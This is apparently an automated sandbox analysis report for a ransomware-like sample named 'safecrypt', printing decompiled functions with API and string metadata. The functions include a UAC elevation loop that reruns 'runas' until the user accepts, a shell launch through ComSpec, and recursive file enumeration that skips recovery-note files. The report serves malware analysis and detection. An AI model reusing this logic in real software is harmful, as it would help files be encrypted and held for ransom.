                    						E00425AA2( &_v16392, 0x1000, L"DE");
                    						E00425AA2( &_v16392, 0x1000, L"L ");
                    						_t44 =  &_v16392;
                    						E00425AA2( &_v16392, 0x1000,  &_v8200);
                    						_t29 = E00412FC0( &_v16392, 0, 1, 0x9802ef26);
                    						_push(0x1000);
                    						_push( &_v8200);
                    						_push(L"ComSpec");
                    						if( *_t29() == 0) {
                    							goto L5;
                    						} else {
                    							_t44 =  &_v8200;
                    							_t31 = E00420860( &_v16392,  &_v8200); // executed
                    							if(_t31 <= 0x20) {
                    								goto L5;
                    							} else {
                    								return E004256D3(1, __ebx, _v8 ^ _t48,  &_v8200, __edi, __esi);
                    							}
                    						}
                    					}
                    				}
                    			}













                    APIs
                    • GetShortPathNameW.KERNELBASE ref: 0041FF0F
                      • Part of subcall function 00420860: ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000,747DFE60,00000000), ref: 00420959
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteNamePathShellShort
                    • String ID: /c $ComSpec
                    • API String ID: 1456131810-392535306
                    • Opcode ID: 8304254ec000344d77d1a01cd53706af39abbcd87ad3fbb620b4997490f2518c
                    • Instruction ID: 442ed99b0e111f2b40a0611dfd883a82b056479ad36b6e664011fceea2867897
                    • Opcode Fuzzy Hash: 8304254ec000344d77d1a01cd53706af39abbcd87ad3fbb620b4997490f2518c
                    • Instruction Fuzzy Hash: 2721CB71B4031866EB24D7619D83FEEB3748F48744F50049EB709BA1C1EEF8EA84865D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E004233B0(intOrPtr _a4, signed int _a8) {
                    				intOrPtr _t15;
                    				signed int _t18;
                    				signed int _t22;
                    				signed int _t28;
                    				signed int _t30;
                    				void* _t32;
                    				void* _t33;
                    
                    				_t22 = _a8;
                    				_t28 = 0;
                    				_t34 = _t22;
                    				if(_t22 <= 0) {
                    					_t15 = _a4;
                    					__eflags = 0;
                    					 *((short*)(_t15 + _t22 * 2)) = 0;
                    					return _t15;
                    				} else {
                    					do {
                    						E0042671C(GetTickCount());
                    						_t33 = _t32 + 4;
                    						do {
                    							_t18 = E0042672E(_t34);
                    							asm("cdq");
                    							_t30 = _t18 % 0x7a;
                    						} while (_t30 < 0x61);
                    						E0042671C(1);
                    						_t32 = _t33 + 4;
                    						 *(_a4 + _t28 * 2) = _t30;
                    						Sleep(0xf); // executed
                    						_t28 = _t28 + 1;
                    					} while (_t28 < _t22);
                    					 *((short*)(_a4 + _t22 * 2)) = 0;
                    					return 0;
                    				}
                    			}











                    APIs
                    • GetTickCount.KERNEL32 ref: 004233C0
                      • Part of subcall function 0042671C: __getptd.LIBCMT ref: 00426721
                    • _rand.LIBCMT ref: 004233D0
                      • Part of subcall function 0042672E: __getptd.LIBCMT ref: 0042672E
                    • Sleep.KERNELBASE(0000000F), ref: 004233F7
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: __getptd$CountSleepTick_rand
                    • String ID:
                    • API String ID: 1716435427-0
                    • Opcode ID: af772c5cec22a5610f4258c57a2651eaba347f65a4ceb22c1b9fe1d94790e234
                    • Instruction ID: 78c04d1eafe4dc66247dda726c4a7a38e39494e4419d44e57d0758d24792d6e0
                    • Opcode Fuzzy Hash: af772c5cec22a5610f4258c57a2651eaba347f65a4ceb22c1b9fe1d94790e234
                    • Instruction Fuzzy Hash: DAF02876704114ABD300AF6AFC81A5E7369EFC4328F40943BF50DC7221CD7A955143AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004285EA(int _a4) {
                    
                    				E004285BF(_a4);
                    				ExitProcess(_a4);
                    			}




                    APIs
                    • ___crtCorExitProcess.LIBCMT ref: 004285F2
                      • Part of subcall function 004285BF: GetModuleHandleW.KERNEL32(mscoree.dll,?,004285F7,00000000,?,00425921,000000FF,0000001E,00000001,00000000,00000000,?,0042C81E,00000000,00000001,00000000), ref: 004285C9
                      • Part of subcall function 004285BF: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004285D9
                    • ExitProcess.KERNEL32 ref: 004285FB
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                    • String ID:
                    • API String ID: 2427264223-0
                    • Opcode ID: 0fbedbcc82609b8c1b0f974318193ec2f11ac91005322a8097b35192de1fcb5f
                    • Instruction ID: ac6cba6f1f308a56e8ebcb6e59c77a59a577169e453ef347d71d5838df0d33b6
                    • Opcode Fuzzy Hash: 0fbedbcc82609b8c1b0f974318193ec2f11ac91005322a8097b35192de1fcb5f
                    • Instruction Fuzzy Hash: 65B09B31000108BBCF012F12DC0995D3F15DB813507545025F91805135DF719D9195C4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 52%
                    			E00420860(short* __ecx, short* _a4) {
                    				signed int _v8;
                    				char _v136;
                    				int _v140;
                    				int _v144;
                    				short* _v148;
                    				short* _v152;
                    				void* _v156;
                    				void* _v160;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t25;
                    				void* _t30;
                    				intOrPtr* _t32;
                    				intOrPtr* _t33;
                    				intOrPtr _t35;
                    				int _t37;
                    				intOrPtr _t46;
                    				char* _t50;
                    				signed int _t52;
                    				void* _t53;
                    
                    				_t25 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t25 ^ _t52;
                    				_v152 = _a4;
                    				_t28 = 0;
                    				_v148 = __ecx;
                    				_t50 = 0x439dbc;
                    				_t37 = 0;
                    				_v144 = 0;
                    				_v160 = 0x439dbc;
                    				_v140 = 0;
                    				_t43 = 0xf2;
                    				while( *((intOrPtr*)(_t37 + 0x439dbc)) != _t43) {
                    					_t37 = _t37 + 1;
                    					if(_t37 < 0x80) {
                    						continue;
                    					}
                    					_v140 = _t37;
                    					L7:
                    					_t32 = E00412FC0(_t43, 0, 1, 0xa48d6762);
                    					_t53 = _t53 + 0xc;
                    					_push(_t50);
                    					if( *_t32() == 0) {
                    						_t33 = E00412FC0(_t43, _t28, 1, 0xc8ac8026);
                    						_t53 = _t53 + 0xc;
                    						_t28 =  *_t33(_t50);
                    					}
                    					L9:
                    					E00412EE0(_t28, 0x570bc88f);
                    					_t30 = ShellExecuteW(0, 0, _v152, _v148, 0, 0); // executed
                    					_pop(_t46);
                    					return E004256D3(_t30, _t35, _v8 ^ _t52, _v152, _t46, _t50);
                    				}
                    				_t43 =  &_v136;
                    				_v140 = _t37;
                    				_v156 =  &_v136;
                    				if(_t37 > 0) {
                    					asm("pushad");
                    					memcpy(_v156, _v160, _v140);
                    					_t53 = _t53 + 0xc;
                    					asm("popad");
                    					_t28 = _v144;
                    					_t37 = _v140;
                    				}
                    				 *((char*)(_t52 + _t37 - 0x84)) = 0;
                    				_t50 =  &_v136;
                    				if(_v136 == 0) {
                    					goto L9;
                    				} else {
                    					goto L7;
                    				}
                    			}

























                    APIs
                    • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000,747DFE60,00000000), ref: 00420959
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID:
                    • API String ID: 587946157-0
                    • Opcode ID: e23c68385ce3c31196e8b4de889bcd8ef0b4662266f7b8423225729cb3af12c7
                    • Instruction ID: 8f484976fbf97d9fcd588f86323662953d4d48f0b33ea12294a00fdecd167eff
                    • Opcode Fuzzy Hash: e23c68385ce3c31196e8b4de889bcd8ef0b4662266f7b8423225729cb3af12c7
                    • Instruction Fuzzy Hash: 27218270E00228ABEF64DB249D42B9AB7B4BF45304F5080EEA54DF7342DAB55E858F54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E0042E3E0(signed int _a4, signed int _a8, long _a12) {
                    				void* _t10;
                    				long _t11;
                    				long _t12;
                    				signed int _t13;
                    				signed int _t17;
                    				long _t19;
                    				long _t24;
                    
                    				_t17 = _a4;
                    				if(_t17 == 0) {
                    					L3:
                    					_t24 = _t17 * _a8;
                    					__eflags = _t24;
                    					if(_t24 == 0) {
                    						_t24 = _t24 + 1;
                    						__eflags = _t24;
                    					}
                    					goto L5;
                    					L6:
                    					_t10 = RtlAllocateHeap( *0x43ea98, 8, _t24); // executed
                    					__eflags = 0;
                    					if(0 == 0) {
                    						goto L7;
                    					}
                    					L14:
                    					return _t10;
                    					goto L15;
                    					L7:
                    					__eflags =  *0x43f0fc;
                    					if( *0x43f0fc == 0) {
                    						_t19 = _a12;
                    						__eflags = _t19;
                    						if(_t19 != 0) {
                    							 *_t19 = 0xc;
                    						}
                    					} else {
                    						_t11 = E00428AC7(_t10, _t24);
                    						__eflags = _t11;
                    						if(_t11 != 0) {
                    							L5:
                    							_t10 = 0;
                    							__eflags = _t24 - 0xffffffe0;
                    							if(_t24 > 0xffffffe0) {
                    								goto L7;
                    							} else {
                    								goto L6;
                    							}
                    						} else {
                    							_t12 = _a12;
                    							__eflags = _t12;
                    							if(_t12 != 0) {
                    								 *_t12 = 0xc;
                    							}
                    							_t10 = 0;
                    						}
                    					}
                    					goto L14;
                    				} else {
                    					_t13 = 0xffffffe0;
                    					_t27 = _t13 / _t17 - _a8;
                    					if(_t13 / _t17 >= _a8) {
                    						goto L3;
                    					} else {
                    						 *((intOrPtr*)(E00426D35(_t27))) = 0xc;
                    						return 0;
                    					}
                    				}
                    				L15:
                    			}











                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042C868,00000000,?,00000000,00000000,00000000,?,0042A8B7,00000001,00000214), ref: 0042E423
                      • Part of subcall function 00426D35: __getptd_noexit.LIBCMT ref: 00426D35
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap__getptd_noexit
                    • String ID:
                    • API String ID: 328603210-0
                    • Opcode ID: 7ceacb3bd7153f9d101443cf8f83e965562f2032ade726dfa4d45279d23e6cc9
                    • Instruction ID: 3048370fbd15864a2de75c7d1c5ff97586d4d0b22b8673ec9d9c2682b6d2bf7b
                    • Opcode Fuzzy Hash: 7ceacb3bd7153f9d101443cf8f83e965562f2032ade726dfa4d45279d23e6cc9
                    • Instruction Fuzzy Hash: 7B01B5313012359AEF28BF27FC04B673755AB91364F45853BA915CB291DB7898008659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 25%
                    			E00428842(intOrPtr _a4) {
                    				void* __ebp;
                    				void* _t2;
                    				void* _t3;
                    				void* _t4;
                    				void* _t5;
                    				void* _t8;
                    
                    				_push(0);
                    				_push(0);
                    				_push(_a4);
                    				_t2 = E00428702(_t3, _t4, _t5, _t8); // executed
                    				return _t2;
                    			}










                    APIs
                    • _doexit.LIBCMT ref: 0042884E
                      • Part of subcall function 00428702: __lock.LIBCMT ref: 00428710
                      • Part of subcall function 00428702: RtlDecodePointer.NTDLL(0043A130,00000020,00428869,00000000,00000001,00000000,?,004288A9,000000FF,?,0042CD76,00000011,00000000,?,0042A822,0000000D), ref: 0042874C
                      • Part of subcall function 00428702: DecodePointer.KERNEL32(?,004288A9,000000FF,?,0042CD76,00000011,00000000,?,0042A822,0000000D), ref: 0042875D
                      • Part of subcall function 00428702: DecodePointer.KERNEL32(-00000004,?,004288A9,000000FF,?,0042CD76,00000011,00000000,?,0042A822,0000000D), ref: 00428783
                      • Part of subcall function 00428702: DecodePointer.KERNEL32(?,004288A9,000000FF,?,0042CD76,00000011,00000000,?,0042A822,0000000D), ref: 00428796
                      • Part of subcall function 00428702: DecodePointer.KERNEL32(?,004288A9,000000FF,?,0042CD76,00000011,00000000,?,0042A822,0000000D), ref: 004287A0
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer$__lock_doexit
                    • String ID:
                    • API String ID: 3343572566-0
                    • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                    • Instruction ID: 410251afda8765797f56776bd077054fac49f1cf5a99ee80198f4435a3742b9e
                    • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                    • Instruction Fuzzy Hash: 01B0927268020833DA212982AC03F1A3A0987E0B64EA50025FA0C191A1A9A6A9618289
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlEncodePointer.NTDLL(00000000,0042D2A2,0043EAD0,00000314,00000000,?,?,?,?,?,00428A0D,0043EAD0,Microsoft Visual C++ Runtime Library,00012010), ref: 0042A757
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodePointer
                    • String ID:
                    • API String ID: 2118026453-0
                    • Opcode ID: e8bd5948ff0ba12d8d763c2ef6712d4ab9fee5624a4f549d056d68599dfc5c06
                    • Instruction ID: 55457e734866364b10becd5164e672ba337638dfa2f33bdc9a848ead0b38efeb
                    • Opcode Fuzzy Hash: e8bd5948ff0ba12d8d763c2ef6712d4ab9fee5624a4f549d056d68599dfc5c06
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    APIs
                    • GetVersionExW.KERNEL32 ref: 0041CC2A
                    • LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 0041CC3B
                    • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041CC46
                    • LoadLibraryW.KERNEL32(NETAPI32.DLL), ref: 0041CC4F
                    • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 0041CC67
                    • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 0041CC73
                    • FreeLibrary.KERNEL32(00000000), ref: 0041CD35
                    • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 0041CD4D
                    • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 0041CD5B
                    • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 0041CD6B
                    • FreeLibrary.KERNEL32(?), ref: 0041CE4D
                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041CE63
                    • GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 0041CE6F
                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0041CE7B
                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0041CE87
                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0041CE93
                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0041CE9F
                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041CEAB
                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041CEB7
                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0041CEC3
                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0041CECF
                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0041CEDB
                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0041CEE7
                    • GetTickCount.KERNEL32 ref: 0041CF81
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Library$Load$Free$CountTickVersion
                    • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next
                    • API String ID: 548066447-715222291
                    • Opcode ID: b9021eb9554bb8b5bd5fac215fcbf1c3fad1c07227abf969bd0ecfe80a0513a8
                    • Instruction ID: e325c2c0c16efb651a2c9cc273a3c738e8a9eef4192e713dfe2993f8c5413f84
                    • Opcode Fuzzy Hash: b9021eb9554bb8b5bd5fac215fcbf1c3fad1c07227abf969bd0ecfe80a0513a8
                    • Instruction Fuzzy Hash: AFF16271A443419BD720DF65DC85B9BBBF8AF88704F04492EF588D2290DBB8D984CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0041EB60() {
                    				signed int _v8;
                    				char _v528;
                    				short _v1048;
                    				char _v2088;
                    				struct _SHELLEXECUTEINFOW _v2148;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t24;
                    				long _t31;
                    				void* _t46;
                    				void* _t59;
                    				void* _t61;
                    				signed int _t63;
                    
                    				_t24 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t24 ^ _t63;
                    				E0042C770( &_v2088, 0, 0x410);
                    				E0042C770( &_v1048, 0, 0x208);
                    				_t56 =  &_v528;
                    				E0042C770( &_v528, 0, 0x208);
                    				_t31 = GetEnvironmentVariableW(L"windir",  &_v1048, 0x208);
                    				if(_t31 != 0 && _t31 <= 0x208) {
                    					_t56 =  &_v2088;
                    					if(E0041EAF0(0x410,  &_v2088, L"%s\\system32\\cmd.exe",  &_v1048) == 0) {
                    						_push(_t61);
                    						E00426210( &_v528, 0x104, L"/c start \"\" \"");
                    						E00425AA2( &_v528, 0x104, 0x46a450);
                    						E00425AA2( &_v528, 0x104, "\"");
                    						E0042C770( &_v2148, 0, 0x3c);
                    						_v2148.cbSize = 0x3c;
                    						_v2148.lpVerb = L"runas";
                    						_v2148.lpFile =  &_v2088;
                    						_v2148.lpParameters =  &_v528;
                    						_v2148.nShow = 0;
                    						_v2148.fMask = 0x40;
                    						if(ShellExecuteExW( &_v2148) == 0) {
                    							_push(_t46);
                    							_push(_t59);
                    							while(GetLastError() == 0x4c7) {
                    								Sleep(0x3e8);
                    								if(ShellExecuteExW( &_v2148) == 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							_pop(_t59);
                    							_pop(_t46);
                    						}
                    						_t56 = _v2148.hProcess;
                    						CloseHandle(_v2148.hProcess);
                    						_pop(_t61);
                    					}
                    				}
                    				return E004256D3(1, _t46, _v8 ^ _t63, _t56, _t59, _t61);
                    			}


















                    APIs
                    • _memset.LIBCMT ref: 0041EB81
                    • _memset.LIBCMT ref: 0041EB94
                    • _memset.LIBCMT ref: 0041EBA7
                    • GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041EBC0
                      • Part of subcall function 0041EAF0: _vsnwprintf.NTDLL ref: 0041EB1F
                    • _memset.LIBCMT ref: 0041EC4F
                    • ShellExecuteExW.SHELL32(?), ref: 0041ECA4
                    • GetLastError.KERNEL32 ref: 0041ECB8
                    • Sleep.KERNEL32(000003E8), ref: 0041ECC6
                    • ShellExecuteExW.SHELL32(0000003C), ref: 0041ECCF
                    • CloseHandle.KERNEL32(?), ref: 0041ECDE
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$ExecuteShell$CloseEnvironmentErrorHandleLastSleepVariable_vsnwprintf
                    • String ID: %s\system32\cmd.exe$/c start "" "$<$@$runas$windir
                    • API String ID: 3370961082-322324821
                    • Opcode ID: fd6f5a003a4712941eb55314001929a588cf7b7a701bd01644bda6015d4e8651
                    • Instruction ID: fbc655fe99c80366fce70685c54fda4c900a0abb96979987ed020d9a5d484dfe
                    • Opcode Fuzzy Hash: fd6f5a003a4712941eb55314001929a588cf7b7a701bd01644bda6015d4e8651
                    • Instruction Fuzzy Hash: 0D31E0B5A4031C97DB10D762DC45FDA73B8BF44704F5045DAB608A61C1EB789A848FDC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00413AD0(intOrPtr* _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				char _v8202;
                    				short _v8204;
                    				char _v16394;
                    				char _v16396;
                    				struct _WIN32_FIND_DATAW _v16988;
                    				void* _v16992;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t55;
                    				intOrPtr* _t71;
                    				char* _t85;
                    				char* _t86;
                    				intOrPtr* _t88;
                    				intOrPtr* _t92;
                    				intOrPtr* _t93;
                    				intOrPtr* _t94;
                    				intOrPtr* _t102;
                    				intOrPtr _t110;
                    				intOrPtr* _t114;
                    				intOrPtr* _t115;
                    				intOrPtr _t116;
                    				intOrPtr* _t118;
                    				intOrPtr* _t119;
                    				intOrPtr* _t120;
                    				void* _t128;
                    				void* _t131;
                    				signed int _t133;
                    				void* _t134;
                    				void* _t138;
                    				void* _t139;
                    				void* _t142;
                    				void* _t144;
                    
                    				E0042DFB0(0x425c);
                    				_t55 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t55 ^ _t133;
                    				_t102 = _a4;
                    				_v8204 = 0;
                    				E0042C770( &_v8202, 0, 0x1ffe);
                    				_v16396 = 0;
                    				E0042C770( &_v16394, 0, 0x1ffe);
                    				E00426210( &_v8204, 0x1000, _t102);
                    				_t124 =  &_v8204;
                    				E00425AA2( &_v8204, 0x1000, L"\\*.*");
                    				_t138 = _t134 + 0x30;
                    				_t131 = FindFirstFileW( &_v8204,  &_v16988);
                    				_v16992 = _t131;
                    				if(_t131 != 0xffffffff) {
                    					do {
                    						if((_v16988.dwFileAttributes & 0x00000010) == 0) {
                    							if(_a8 == 1) {
                    								E00426210( &_v8204, 0x1000, _t102);
                    								E00425AA2( &_v8204, 0x1000, "\\");
                    								E00425AA2( &_v8204, 0x1000,  &(_v16988.cFileName));
                    								_t71 =  &(_v16988.cFileName);
                    								_t142 = _t138 + 0x24;
                    								_t124 = _t71 + 2;
                    								do {
                    									_t110 =  *_t71;
                    									_t71 = _t71 + 2;
                    								} while (_t110 != 0);
                    								_t130 = (_t71 - _t124 >> 1) + 1;
                    								_t132 = E00426273( &(_v16988.cFileName));
                    								E00426123(_t75, (_t71 - _t124 >> 1) + 1);
                    								_t144 = _t142 + 0xc;
                    								if(E00413A60(L"recove", _t75) == 0 && E00413A60(L".micro", _t132) == 0 && E004142C0(_t132) == 1) {
                    									E00413E70( &_v8204);
                    								}
                    								E004258B8(_t132);
                    								_t131 = _v16992;
                    								goto L55;
                    							}
                    						} else {
                    							_t114 =  &(_v16988.cFileName);
                    							_t85 = ".";
                    							while(1) {
                    								_t124 =  *_t85;
                    								if(_t124 !=  *_t114) {
                    									break;
                    								}
                    								if(_t124 == 0) {
                    									L7:
                    									_t85 = 0;
                    								} else {
                    									_t16 =  &(_t85[2]); // 0x2e0000
                    									_t124 =  *_t16;
                    									if(_t124 !=  *((intOrPtr*)(_t114 + 2))) {
                    										break;
                    									} else {
                    										_t85 =  &(_t85[4]);
                    										_t114 = _t114 + 4;
                    										if(_t124 != 0) {
                    											continue;
                    										} else {
                    											goto L7;
                    										}
                    									}
                    								}
                    								L9:
                    								if(_t85 != 0) {
                    									_t115 =  &(_v16988.cFileName);
                    									_t86 = L"..";
                    									while(1) {
                    										_t124 =  *_t86;
                    										if(_t124 !=  *_t115) {
                    											break;
                    										}
                    										if(_t124 == 0) {
                    											L15:
                    											_t86 = 0;
                    										} else {
                    											_t19 =  &(_t86[2]); // 0x2e
                    											_t124 =  *_t19;
                    											if(_t124 !=  *((intOrPtr*)(_t115 + 2))) {
                    												break;
                    											} else {
                    												_t86 =  &(_t86[4]);
                    												_t115 = _t115 + 4;
                    												if(_t124 != 0) {
                    													continue;
                    												} else {
                    													goto L15;
                    												}
                    											}
                    										}
                    										L17:
                    										if(_t86 != 0) {
                    											E00426210( &_v8204, 0x1000, _t102);
                    											_t88 = _t102;
                    											_t139 = _t138 + 0xc;
                    											_t22 = _t88 + 2; // 0x44023a
                    											_t128 = _t22;
                    											do {
                    												_t116 =  *_t88;
                    												_t88 = _t88 + 2;
                    											} while (_t116 != 0);
                    											if(_t88 - _t128 >> 1 > 3) {
                    												E00425AA2( &_v8204, 0x1000, "\\");
                    												_t139 = _t139 + 0xc;
                    											}
                    											E00425AA2( &_v8204, 0x1000,  &(_v16988.cFileName));
                    											_t138 = _t139 + 0xc;
                    											_t118 =  &_v8204;
                    											_t92 = 0x476450;
                    											while(1) {
                    												_t124 =  *_t92;
                    												if(_t124 !=  *_t118) {
                    													break;
                    												}
                    												if(_t124 == 0) {
                    													L27:
                    													_t92 = 0;
                    												} else {
                    													_t124 =  *((intOrPtr*)(_t92 + 2));
                    													if(_t124 !=  *((intOrPtr*)(_t118 + 2))) {
                    														break;
                    													} else {
                    														_t92 = _t92 + 4;
                    														_t118 = _t118 + 4;
                    														if(_t124 != 0) {
                    															continue;
                    														} else {
                    															goto L27;
                    														}
                    													}
                    												}
                    												L29:
                    												if(_t92 != 0) {
                    													_t119 =  &_v8204;
                    													_t93 = 0x478450;
                    													while(1) {
                    														_t124 =  *_t93;
                    														if(_t124 !=  *_t119) {
                    															break;
                    														}
                    														if(_t124 == 0) {
                    															L35:
                    															_t93 = 0;
                    														} else {
                    															_t124 =  *((intOrPtr*)(_t93 + 2));
                    															if(_t124 !=  *((intOrPtr*)(_t119 + 2))) {
                    																break;
                    															} else {
                    																_t93 = _t93 + 4;
                    																_t119 = _t119 + 4;
                    																if(_t124 != 0) {
                    																	continue;
                    																} else {
                    																	goto L35;
                    																}
                    															}
                    														}
                    														L37:
                    														if(_t93 != 0) {
                    															_t120 =  &_v8204;
                    															_t94 = 0x47a450;
                    															while(1) {
                    																_t124 =  *_t94;
                    																if(_t124 !=  *_t120) {
                    																	break;
                    																}
                    																if(_t124 == 0) {
                    																	L43:
                    																	_t94 = 0;
                    																} else {
                    																	_t124 =  *((intOrPtr*)(_t94 + 2));
                    																	if(_t124 !=  *((intOrPtr*)(_t120 + 2))) {
                    																		break;
                    																	} else {
                    																		_t94 = _t94 + 4;
                    																		_t120 = _t120 + 4;
                    																		if(_t124 != 0) {
                    																			continue;
                    																		} else {
                    																			goto L43;
                    																		}
                    																	}
                    																}
                    																L45:
                    																if(_t94 != 0) {
                    																	E00413AD0( &_v8204, _a8);
                    																	_t124 =  &_v8204;
                    																	E00426210( &_v16396, 0x1000,  &_v8204);
                    																	_t144 = _t138 + 0x14;
                    																	E004134E0( &_v16396);
                    																	L55:
                    																	_t138 = _t144 + 4;
                    																}
                    																goto L56;
                    															}
                    															asm("sbb eax, eax");
                    															asm("sbb eax, 0xffffffff");
                    															goto L45;
                    														}
                    														goto L56;
                    													}
                    													asm("sbb eax, eax");
                    													asm("sbb eax, 0xffffffff");
                    													goto L37;
                    												}
                    												goto L56;
                    											}
                    											asm("sbb eax, eax");
                    											asm("sbb eax, 0xffffffff");
                    											goto L29;
                    										}
                    										goto L56;
                    									}
                    									asm("sbb eax, eax");
                    									asm("sbb eax, 0xffffffff");
                    									goto L17;
                    								}
                    								goto L56;
                    							}
                    							asm("sbb eax, eax");
                    							asm("sbb eax, 0xffffffff");
                    							goto L9;
                    						}
                    						L56:
                    					} while (FindNextFileW(_t131,  &_v16988) != 0);
                    					_t64 = FindClose(_t131);
                    				}
                    				return E004256D3(_t64, _t102, _v8 ^ _t133, _t124, _t130, _t131);
                    			}






































                    APIs
                    • _memset.LIBCMT ref: 00413B03
                    • _memset.LIBCMT ref: 00413B21
